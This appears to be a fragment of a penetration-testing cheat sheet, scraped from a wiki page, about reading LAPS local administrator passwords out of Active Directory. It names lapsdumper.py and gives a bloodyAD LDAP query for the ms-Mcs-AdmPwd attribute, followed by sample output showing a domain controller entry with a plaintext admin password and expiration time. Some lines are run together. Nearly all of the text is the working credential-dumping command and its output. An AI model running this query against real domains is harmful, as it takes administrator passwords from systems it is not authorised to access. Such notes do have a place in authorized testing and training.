LAPS
lapsdumper.py
bloodyAD
bloodyAD --host DC_IP -d domain.local -u user -p 'PASSWORD' \
get search \
--filter '(ms-mcs-admpwdexpirationtime=*)' \
--attr ms-mcs-admpwd,ms-mcs-admpwdexpirationtimedistinguishedName: CN=DC01,OU=Domain Controllers,DC=domain,DC=local
ms-Mcs-AdmPwd: V,!31D;3&M+2h.
ms-Mcs-AdmPwdExpirationTime: 134260119643091883Powerview Dump
Last updated